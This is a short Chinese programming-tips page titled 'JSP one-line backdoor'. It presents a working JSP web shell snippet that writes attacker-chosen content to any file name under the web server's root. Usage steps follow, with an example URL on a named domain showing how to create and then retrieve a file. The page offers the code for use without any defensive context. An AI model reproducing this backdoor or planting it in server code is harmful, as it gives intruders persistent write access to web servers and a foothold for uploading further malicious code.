当前位置:编程学习 > JSP >>

JSP一句话后门

答案:<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld

然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld

上一个:weblogic 8.1下重新编译java类但不用重启服务器的方法
下一个:张孝祥JAVA全集 Ftp下载[100%能下载]

CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,